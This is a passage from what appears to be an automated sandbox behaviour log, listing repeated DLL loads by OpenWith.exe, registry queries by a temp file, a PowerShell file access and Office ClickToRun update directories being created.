    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\UpdatesJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45AJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-math-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-private-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-process-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-string-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-time-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ApiClient.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVCatalog.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\appvcleaner.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVClient.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVClientIsv.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVFileSystemMetadata.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIntegration.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvApi.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvStreamingManager.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvSubsystemController.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems32.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64_arm64x.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvVirtualization.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVManifest.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVOrchestration.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVPolicy.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVScripting.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVShNotify.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R32.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r32werhandler.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R64.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r64werhandler.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RHeartbeatConfig.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ar-sa.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.bg-bg.dllJump to behavior
